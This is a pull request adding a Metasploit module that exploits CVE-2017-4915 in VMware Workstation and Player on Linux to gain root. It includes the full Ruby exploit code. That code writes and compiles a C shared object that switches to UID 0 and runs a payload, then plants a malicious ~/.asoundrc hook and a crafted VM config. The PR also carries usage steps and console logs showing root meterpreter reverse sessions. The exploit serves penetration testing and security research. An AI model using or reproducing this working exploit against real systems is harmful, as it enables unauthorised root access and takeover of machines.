### PR TITLE
Add VMware Workstation ALSA Config File Local Privilege Escalation module

### DIFF
--- a/documentation/modules/exploit/linux/local/vmware_alsa_config.md
+++ b/documentation/modules/exploit/linux/local/vmware_alsa_config.md
@@ -1,0 +1,63 @@
+## Description
+
+  This module exploits a vulnerability in VMware Workstation Pro and Player before version 12.5.6 on Linux which allows users to escalate their privileges by using an ALSA configuration file to load and execute a shared object as root when launching a virtual machine with an attached sound card.
+
+
+## Vulnerable Application
+
+  VMware Workstation Pro and VMware Workstation Player are the industry standard for running multiple operating systems as virtual machines on a single PC. Thousands of IT professionals, developers and businesses use Workstation Pro and Workstation Player to be more agile, more productive and more secure every day.
+
+  This module has been tested successfully on:
+
+  * VMware Player version 12.5.0 on Debian Linux
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. Do: `use exploit/linux/local/vmware_alsa_config`
+  4. Do: `set SESSION [SESSION]`
+  5. Do: `check`
+  6. Do: `run`
+  7. You should get a new root session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+  ```
+  msf exploit(vmware_alsa_config) > check
+
+  [!] SESSION may not be compatible with this module.
+  [+] Target version is vulnerable
+  [+]  The target is vulnerable.
+  msf exploit(vmware_alsa_config) > run
+
+  [!] SESSION may not be compatible with this module.
+  [*] Started reverse TCP handler on 172.16.191.181:4444 
+  [+] Target version is vulnerable
+  [*] Launching VMware Player...
+  [*] Meterpreter session 2 opened (172.16.191.181:4444 -> 172.16.191.221:33807) at 2017-06-23 08:22:11 -0400
+  [*] Removing /tmp/.baVu7FwzlaIQyp
+  [*] Removing /home/user/.asoundrc
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 172.16.191.221
+  OS           : Debian 8.8 (Linux 3.16.0-4-amd64)
+  Architecture : x64
+  Meterpreter  : x64/linux
+  ```
+

--- a/modules/exploits/linux/local/vmware_alsa_config.rb
+++ b/modules/exploits/linux/local/vmware_alsa_config.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -27,6 +27,7 @@ class MetasploitModule < Msf::Exploit::Local
           [ 'CVE', '2017-4915' ],
           [ 'EDB', '42045' ],
           [ 'BID', '98566' ],
+          [ 'URL', 'https://gist.github.com/bcoles/cd26a831473088afafefc93641e184a9' ],
           [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2017-0009.html' ],
           [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1142' ]
         ],
@@ -46,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Local
       'DefaultOptions' =>
         {
           'Payload'     => 'linux/x64/meterpreter_reverse_tcp',
-          'WfsDelay'    => 15,
+          'WfsDelay'    => 30,
           'PrependFork' => true
         },
       'DefaultTarget'  => 1,
@@ -60,7 +61,6 @@ class MetasploitModule < Msf::Exploit::Local
 
   def has_prereqs?
     vmplayer = cmd_exec 'which vmplayer'
-    Rex.sleep 0.5
     if vmplayer.include? 'vmplayer'
       vprint_good 'vmplayer is installed'
     else
@@ -69,7 +69,6 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     gcc = cmd_exec 'which gcc'
-    Rex.sleep 0.5
     if gcc.include? 'gcc'
       vprint_good 'gcc is installed'
     else
@@ -88,7 +87,6 @@ class MetasploitModule < Msf::Exploit::Local
 
     begin
       config = read_file '/etc/vmware/config'
-      Rex.sleep 0.5
     rescue
       config = ''
     end
@@ -117,16 +115,15 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     @home_dir = cmd_exec 'echo ${HOME}'
-    Rex.sleep 0.5
     unless @home_dir
       print_error "Could not find user's home directory"
       return
     end
+    @prefs_file = "#{@home_dir}/.vmware/preferences"
 
-    fname = rand_text_alphanumeric rand(10) + 5
-    @base_dir = "#{datastore['WritableDir']}/.#{fname}"
+    fname = ".#{rand_text_alphanumeric rand(10) + 5}"
+    @base_dir = "#{datastore['WritableDir']}/#{fname}"
     cmd_exec "mkdir #{@base_dir}"
-    Rex.sleep 0.5
 
     so = %Q^
 /*
@@ -159,11 +156,9 @@ __attribute__((constructor)) void run(void) {
 ^
     vprint_status "Writing #{@base_dir}/#{fname}.c"
     write_file "#{@base_dir}/#{fname}.c", so
-    Rex.sleep 0.5
 
     vprint_status "Compiling #{@base_dir}/#{fname}.o"
     output = cmd_exec "gcc -fPIC -shared -o #{@base_dir}/#{fname}.so #{@base_dir}/#{fname}.c -Wall -ldl -std=gnu99"
-    Rex.sleep 0.5
     unless output == ''
       print_error "Compilation failed: #{output}"
       return
@@ -195,71 +190,66 @@ monitor_control.disable_longmode = 1
 |
     vprint_status "Writing #{@base_dir}/#{fname}.vmx"
     write_file "#{@base_dir}/#{fname}.vmx", vmx
-    Rex.sleep 0.5
 
     vprint_status "Writing #{@base_dir}/#{fname}.elf"
     write_file "#{@base_dir}/#{fname}.elf", generate_payload_exe
-    Rex.sleep 0.5
 
     vprint_status "Setting #{@base_dir}/#{fname}.elf executable"
     cmd_exec "chmod +x #{@base_dir}/#{fname}.elf"
-    Rex.sleep 0.5
 
     asoundrc = %Q|
 hook_func.pulse_load_if_running {
-        lib "#{@base_dir}/#{fname}.so"
-        func "conf_pulse_hook_load_if_running"
+  lib "#{@base_dir}/#{fname}.so"
+  func "conf_pulse_hook_load_if_running"
 }
 |
     vprint_status "Writing #{@home_dir}/.asoundrc"
     write_file "#{@home_dir}/.asoundrc", asoundrc
-    Rex.sleep 0.5
 
     vprint_status 'Disabling VMware hint popups'
     unless directory? "#{@home_dir}/.vmware"
       cmd_exec "mkdir #{@home_dir}/.vmware"
-      Rex.sleep 0.5
-      @remove_prefs = true
+      @remove_prefs_dir = true
     end
 
-    if file? "#{@home_dir}/.vmware/preferences"
+    if file? @prefs_file
       begin
-        prefs = read_file "#{@home_dir}/.vmware/preferences"
-        Rex.sleep 0.5
+        prefs = read_file @prefs_file
       rescue
         prefs = ''
       end
     end
 
-    if prefs.nil? || prefs == ''
+    if prefs.blank?
       prefs = ".encoding = \"UTF8\"\n"
       prefs << "pref.vmplayer.firstRunDismissedVersion = \"999\"\n"
       prefs << "hints.hideAll = \"TRUE\"\n"
+      @remove_prefs_file = true
     elsif prefs =~ /hints\.hideAll/i
       prefs.gsub!(/hints\.hideAll.*$/i, 'hints.hideAll = "TRUE"')
     else
       prefs.sub!(/\n?\z/, "\nhints.hideAll = \"TRUE\"\n")
     end
-    vprint_status "Writing #{@home_dir}/.vmware/preferences"
-    write_file "#{@home_dir}/.vmware/preferences", prefs
-    Rex.sleep 0.5
+    vprint_status "Writing #{@prefs_file}"
+    write_file "#{@prefs_file}", prefs
 
     print_status 'Launching VMware Player...'
     cmd_exec "vmplayer #{@base_dir}/#{fname}.vmx"
-    Rex.sleep 0.5
   end
 
   def cleanup
-    print_status "Removing #{@base_dir}"
-    cmd_exec "rm #{@base_dir} -rf"
-    Rex.sleep 0.5
+    print_status "Removing #{@base_dir} directory"
+    cmd_exec "rm '#{@base_dir}' -rf"
+
     print_status "Removing #{@home_dir}/.asoundrc"
-    cmd_exec "rm #{@home_dir}/.asoundrc"
-    Rex.sleep 0.5
-    if @remove_prefs
-      print_status "Removing #{@home_dir}/.vmware"
-      cmd_exec "rm #{@home_dir}/.vmware -rf"
-      Rex.sleep 0.5
+    cmd_exec "rm '#{@home_dir}/.asoundrc'"
+
+    if @remove_prefs_dir
+      print_status "Removing #{@home_dir}/.vmware directory"
+      cmd_exec "rm '#{@home_dir}/.vmware' -rf"
+    elsif @remove_prefs_file
+      print_status "Removing #{@prefs_file}"
+      cmd_exec "rm '#{@prefs_file}' -rf"
     end
   end
 

--- a/modules/exploits/linux/local/vmware_alsa_config.rb
+++ b/modules/exploits/linux/local/vmware_alsa_config.rb
@@ -1,0 +1,242 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'VMware Workstation ALSA Config File Local Privilege Escalation',
+      'Description'    => %q{
+        This module exploits a vulnerability in VMware Workstation Pro and
+        Player on Linux which allows users to escalate their privileges by
+        using an ALSA configuration file to load and execute a shared object
+        as root when launching a virtual machine with an attached sound card.
+
+        This module has been tested successfully on VMware Player version
+        12.5.0 on Debian Linux.
+      },
+      'References'     =>
+        [
+          [ 'CVE', '2017-4915' ],
+          [ 'EDB', '42045' ],
+          [ 'BID', '98566' ],
+          [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2017-0009.html' ],
+          [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1142' ]
+        ],
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Jann Horn', # Discovery and PoC
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'DisclosureDate' => 'May 22 2017',
+      'Platform'       => 'linux',
+      'Targets'        =>
+        [
+          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
+        ],
+      'DefaultOptions' =>
+        {
+          'Payload'     => 'linux/x64/meterpreter_reverse_tcp',
+          'PrependFork' => true
+        },
+      'DefaultTarget'  => 1,
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Privileged'     => true ))
+    register_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def has_prereqs?
+    def check_vmplayer?
+      vmplayer = cmd_exec 'which vmplayer'
+      Rex.sleep 0.5
+      if vmplayer.include? 'vmplayer'
+        vprint_good 'vmplayer is installed'
+        return true
+      else
+        print_error 'vmplayer is not installed. Exploitation will fail.'
+        return false
+      end
+    end
+    def check_gcc?
+      gcc = cmd_exec 'which gcc'
+      Rex.sleep 0.5
+      if gcc.include? 'gcc'
+        vprint_good 'gcc is installed'
+        return true
+      else
+        print_error 'gcc is not installed. Compiling will fail.'
+        return false
+      end
+    end
+    return check_vmplayer? && check_gcc?
+  end
+
+  def check
+    unless has_prereqs?
+      print_error 'Target missing prerequisites'
+      return CheckCode::Safe
+    end
+
+    config = read_file '/etc/vmware/config'
+    Rex.sleep 0.5
+
+    if config =~ /player\.product\.version\s*=\s*"([\d\.]+)"/
+      @version = Gem::Version.new $1.gsub(/\.$/, '')
+      vprint_status "VMware is version #{@version}"
+    else
+      print_error "Could not determine VMware version."
+      return CheckCode::Unknown
+    end
+
+    if @version < Gem::Version.new('12.5.6')
+      print_good 'Target version is vulnerable'
+      return CheckCode::Vulnerable
+    end
+
+    print_error 'Target version is not vulnerable'
+    CheckCode::Safe
+  end
+
+  def exploit
+    if check == CheckCode::Safe
+      print_error 'Target machine is not vulnerable'
+      return
+    end
+
+    @home_dir = cmd_exec 'echo ~'
+    Rex.sleep 0.5
+    if @home_dir.nil?
+      print_error "Could not find user's home directory"
+      return
+    end
+
+    fname = rand_text_alphanumeric rand(10) + 5
+    @base_dir = "#{datastore['WritableDir']}/.#{fname}"
+    cmd_exec "mkdir #{@base_dir}"
+    Rex.sleep 0.5
+
+    so = %Q^
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1142
+Original shared object code by jhorn
+*/
+
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <string.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/prctl.h>
+#include <err.h>
+
+extern char *program_invocation_short_name;
+
+__attribute__((constructor)) void run(void) {
+	//if (strcmp(program_invocation_short_name, "vmware-vmx"))
+	//	return;
+
+	uid_t ruid, euid, suid;
+	if (getresuid(&ruid, &euid, &suid))
+		err(1, "getresuid");
+	printf("current UIDs: %d %d %d\\n", ruid, euid, suid);
+	if (ruid == 0 || euid == 0 || suid == 0) {
+		if (setresuid(0, 0, 0) || setresgid(0, 0, 0))
+			err(1, "setresxid");
+		printf("switched to root UID and GID");
+		//system("/bin/bash");
+		system("#{@base_dir}/#{fname}.elf");
+		_exit(0);
+	}
+}
+^
+    vprint_status "Writing #{@base_dir}/#{fname}.c"
+    write_file "#{@base_dir}/#{fname}.c", so
+    Rex.sleep 0.5
+
+    vprint_status "Compiling #{@base_dir}/#{fname}.o"
+    output = cmd_exec "gcc -fPIC -shared -o #{@base_dir}/#{fname}.so #{@base_dir}/#{fname}.c -Wall -ldl -std=gnu99"
+    Rex.sleep 0.5
+    unless output.eql? ''
+      print_error "Compilation failed: #{output}"
+      return
+    end
+
+    vmx = %Q|
+.encoding = "UTF-8"
+config.version = "8"
+virtualHW.version = "8"
+scsi0.present = "FALSE"
+memsize = "4"
+ide0:0.present = "FALSE"
+sound.present = "TRUE"
+sound.fileName = "-1"
+sound.autodetect = "TRUE"
+vmci0.present = "FALSE"
+hpet0.present = "FALSE"
+displayName = "#{fname}"
+guestOS = "other"
+nvram = "#{fname}.nvram"
+virtualHW.productCompatibility = "hosted"
+gui.exitOnCLIHLT = "FALSE"
+powerType.powerOff = "soft"
+powerType.powerOn = "soft"
+powerType.suspend = "soft"
+powerType.reset = "soft"
+floppy0.present = "FALSE"
+monitor_control.disable_longmode = 1
+|
+    vprint_status "Writing #{@base_dir}/#{fname}.vmx"
+    write_file "#{@base_dir}/#{fname}.vmx", vmx
+    Rex.sleep 0.5
+
+    vprint_status "Writing #{@base_dir}/#{fname}.elf"
+    write_file "#{@base_dir}/#{fname}.elf", generate_payload_exe
+    Rex.sleep 0.5
+
+    vprint_status "Setting #{@base_dir}/#{fname}.elf executable"
+    cmd_exec "chmod +x #{@base_dir}/#{fname}.elf"
+    Rex.sleep 0.5
+
+    asoundrc = %Q|
+hook_func.pulse_load_if_running {
+        lib "#{@base_dir}/#{fname}.so"
+        func "conf_pulse_hook_load_if_running"
+}
+|
+    vprint_status "Writing #{@home_dir}/.asoundrc"
+    write_file "#{@home_dir}/.asoundrc", asoundrc
+    Rex.sleep 0.5
+
+    print_status "Launching VMware Player..."
+    cmd_exec "vmplayer #{@base_dir}/#{fname}.vmx"
+    Rex.sleep 5 # give vmplayer some time to launch
+  end
+
+  def cleanup
+    print_status "Removing #{@base_dir}"
+    cmd_exec "rm #{@base_dir} -rf"
+    Rex.sleep 0.5
+    print_status "Removing #{@home_dir}/.asoundrc"
+    cmd_exec "rm #{@home_dir}/.asoundrc"
+    Rex.sleep 0.5
+  end
+
+  def on_new_session(session)
+    # if we don't /bin/sh here, our payload times out
+    session.shell_command_token '/bin/sh'
+    super
+  end
+end

--- a/modules/exploits/linux/local/vmware_alsa_config.rb
+++ b/modules/exploits/linux/local/vmware_alsa_config.rb
@@ -46,6 +46,7 @@ class MetasploitModule < Msf::Exploit::Local
       'DefaultOptions' =>
         {
           'Payload'     => 'linux/x64/meterpreter_reverse_tcp',
+          'WfsDelay'    => 15,
           'PrependFork' => true
         },
       'DefaultTarget'  => 1,
@@ -212,7 +213,7 @@ hook_func.pulse_load_if_running {
 
     print_status "Launching VMware Player..."
     cmd_exec "vmplayer #{@base_dir}/#{fname}.vmx"
-    Rex.sleep 5 # give vmplayer some time to launch
+    Rex.sleep 0.5
   end
 
   def cleanup

--- a/modules/exploits/linux/local/vmware_alsa_config.rb
+++ b/modules/exploits/linux/local/vmware_alsa_config.rb
@@ -58,29 +58,25 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def has_prereqs?
-    def check_vmplayer?
-      vmplayer = cmd_exec 'which vmplayer'
-      Rex.sleep 0.5
-      if vmplayer.include? 'vmplayer'
-        vprint_good 'vmplayer is installed'
-        return true
-      else
-        print_error 'vmplayer is not installed. Exploitation will fail.'
-        return false
-      end
+    vmplayer = cmd_exec 'which vmplayer'
+    Rex.sleep 0.5
+    if vmplayer.include? 'vmplayer'
+      vprint_good 'vmplayer is installed'
+    else
+      print_error 'vmplayer is not installed. Exploitation will fail.'
+      return false
     end
-    def check_gcc?
-      gcc = cmd_exec 'which gcc'
-      Rex.sleep 0.5
-      if gcc.include? 'gcc'
-        vprint_good 'gcc is installed'
-        return true
-      else
-        print_error 'gcc is not installed. Compiling will fail.'
-        return false
-      end
+
+    gcc = cmd_exec 'which gcc'
+    Rex.sleep 0.5
+    if gcc.include? 'gcc'
+      vprint_good 'gcc is installed'
+    else
+      print_error 'gcc is not installed. Compiling will fail.'
+      return false
     end
-    return check_vmplayer? && check_gcc?
+
+    true
   end
 
   def check
@@ -115,9 +111,9 @@ class MetasploitModule < Msf::Exploit::Local
       return
     end
 
-    @home_dir = cmd_exec 'echo ~'
+    @home_dir = cmd_exec 'echo ${HOME}'
     Rex.sleep 0.5
-    if @home_dir.nil?
+    unless @home_dir
       print_error "Could not find user's home directory"
       return
     end
@@ -163,7 +159,7 @@ __attribute__((constructor)) void run(void) {
     vprint_status "Compiling #{@base_dir}/#{fname}.o"
     output = cmd_exec "gcc -fPIC -shared -o #{@base_dir}/#{fname}.so #{@base_dir}/#{fname}.c -Wall -ldl -std=gnu99"
     Rex.sleep 0.5
-    unless output.eql? ''
+    unless output == ''
       print_error "Compilation failed: #{output}"
       return
     end

--- a/modules/exploits/linux/local/vmware_alsa_config.rb
+++ b/modules/exploits/linux/local/vmware_alsa_config.rb
@@ -86,8 +86,12 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe
     end
 
-    config = read_file '/etc/vmware/config'
-    Rex.sleep 0.5
+    begin
+      config = read_file '/etc/vmware/config'
+      Rex.sleep 0.5
+    rescue
+      config = ''
+    end
 
     if config =~ /player\.product\.version\s*=\s*"([\d\.]+)"/
       @version = Gem::Version.new $1.gsub(/\.$/, '')
@@ -211,7 +215,36 @@ hook_func.pulse_load_if_running {
     write_file "#{@home_dir}/.asoundrc", asoundrc
     Rex.sleep 0.5
 
-    print_status "Launching VMware Player..."
+    vprint_status 'Disabling VMware hint popups'
+    unless directory? "#{@home_dir}/.vmware"
+      cmd_exec "mkdir #{@home_dir}/.vmware"
+      Rex.sleep 0.5
+      @remove_prefs = true
+    end
+
+    if file? "#{@home_dir}/.vmware/preferences"
+      begin
+        prefs = read_file "#{@home_dir}/.vmware/preferences"
+        Rex.sleep 0.5
+      rescue
+        prefs = ''
+      end
+    end
+
+    if prefs.nil? || prefs == ''
+      prefs = ".encoding = \"UTF8\"\n"
+      prefs << "pref.vmplayer.firstRunDismissedVersion = \"999\"\n"
+      prefs << "hints.hideAll = \"TRUE\"\n"
+    elsif prefs =~ /hints\.hideAll/i
+      prefs.gsub!(/hints\.hideAll.*$/i, 'hints.hideAll = "TRUE"')
+    else
+      prefs.sub!(/\n?\z/, "\nhints.hideAll = \"TRUE\"\n")
+    end
+    vprint_status "Writing #{@home_dir}/.vmware/preferences"
+    write_file "#{@home_dir}/.vmware/preferences", prefs
+    Rex.sleep 0.5
+
+    print_status 'Launching VMware Player...'
     cmd_exec "vmplayer #{@base_dir}/#{fname}.vmx"
     Rex.sleep 0.5
   end
@@ -223,6 +256,11 @@ hook_func.pulse_load_if_running {
     print_status "Removing #{@home_dir}/.asoundrc"
     cmd_exec "rm #{@home_dir}/.asoundrc"
     Rex.sleep 0.5
+    if @remove_prefs
+      print_status "Removing #{@home_dir}/.vmware"
+      cmd_exec "rm #{@home_dir}/.vmware -rf"
+      Rex.sleep 0.5
+    end
   end
 
   def on_new_session(session)

--- a/modules/exploits/linux/local/vmware_alsa_config.rb
+++ b/modules/exploits/linux/local/vmware_alsa_config.rb
@@ -145,21 +145,15 @@ Original shared object code by jhorn
 extern char *program_invocation_short_name;
 
 __attribute__((constructor)) void run(void) {
-	//if (strcmp(program_invocation_short_name, "vmware-vmx"))
-	//	return;
-
-	uid_t ruid, euid, suid;
-	if (getresuid(&ruid, &euid, &suid))
-		err(1, "getresuid");
-	printf("current UIDs: %d %d %d\\n", ruid, euid, suid);
-	if (ruid == 0 || euid == 0 || suid == 0) {
-		if (setresuid(0, 0, 0) || setresgid(0, 0, 0))
-			err(1, "setresxid");
-		printf("switched to root UID and GID");
-		//system("/bin/bash");
-		system("#{@base_dir}/#{fname}.elf");
-		_exit(0);
-	}
+  uid_t ruid, euid, suid;
+  if (getresuid(&ruid, &euid, &suid))
+    err(1, "getresuid");
+  if (ruid == 0 || euid == 0 || suid == 0) {
+    if (setresuid(0, 0, 0) || setresgid(0, 0, 0))
+      err(1, "setresxid");
+    system("#{@base_dir}/#{fname}.elf");
+    _exit(0);
+  }
 }
 ^
     vprint_status "Writing #{@base_dir}/#{fname}.c"


### PR DESCRIPTION
This PR adds VMware Workstation ALSA Config File Local Privilege Escalation exploit module.

        This module exploits a vulnerability in VMware Workstation Pro and
        Player on Linux which allows users to escalate their privileges by
        using an ALSA configuration file to load and execute a shared object
        as root when launching a virtual machine with an attached sound card.

        This module has been tested successfully on VMware Player version
        12.5.0 on Debian Linux.


This module works reliably with the following payloads through both meterpreter and shell sessions:

* linux/x64/meterpreter_reverse_tcp
* linux/x64/meterpreter_reverse_http
* linux/x64/meterpreter_reverse_https
* linux/x64/meterpreter/bind_tcp
* linux/x64/meterpreter/reverse_tcp
* linux/x64/shell/reverse_tcp
* linux/x64/shell/bind_tcp

The module does not work with:

* generic/shell_bind_tcp
* generic/shell_reverse_tcp

It's also worth noting that this module makes extensive use of `Rex.sleep 0.5` between shell commands. This was required due to an unknown issue in how metasploit buffers commands for meterpreter sessions (tested with PHP meterpreter). Without sleeping, the module will hang then fail at random intervals. With the sleeps the module runs perfectly.


### Verification

- [x] Start `msfconsole`
- [x] Get a session
- [x] `use exploit/linux/local/vmware_alsa_config`
- [x] `set SESSION 1`
- [x] `check`
- [x] **Verify** something happens
- [x] `run`
- [x] **Verify** you get a root session

### Sample Output

```
msf exploit(vmware_alsa_config) > run

[!] SESSION may not be compatible with this module.
[*] Started bind handler
[+] Target version is vulnerable
[*] Launching VMware Player...
[*] Sending stage (2849784 bytes) to 172.16.191.216
[*] Meterpreter session 2 opened (172.16.191.181:35024 -> 172.16.191.216:8877) at 2017-06-18 06:32:44 -0400
[*] Removing /tmp/.OgzytA
[*] Removing /home/user/.asoundrc

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo 
Computer     : 172.16.191.216
OS           : Debian 8.8 (Linux 3.16.0-4-amd64)
Architecture : x64
Meterpreter  : x64/linux
```


### Sample Output (Verbose)

```
msf exploit(vmware_alsa_config) > run

[!] SESSION may not be compatible with this module.
[*] Started bind handler
[+] vmplayer is installed
[+] gcc is installed
[*] VMware is version 12.5.0
[+] Target version is vulnerable
[*] Writing /tmp/.IR2EISI/IR2EISI.c
[*] Compiling /tmp/.IR2EISI/IR2EISI.o
[*] Writing /tmp/.IR2EISI/IR2EISI.vmx
[*] Writing /tmp/.IR2EISI/IR2EISI.elf
[*] Setting /tmp/.IR2EISI/IR2EISI.elf executable
[*] Writing /home/user/.asoundrc
[*] Launching VMware Player...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (2849784 bytes) to 172.16.191.216
[*] Meterpreter session 3 opened (172.16.191.181:52923 -> 172.16.191.216:8877) at 2017-06-18 06:35:03 -0400
[*] Removing /tmp/.IR2EISI
[*] Removing /home/user/.asoundrc

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 172.16.191.216
OS           : Debian 8.8 (Linux 3.16.0-4-amd64)
Architecture : x64
Meterpreter  : x64/linux
```
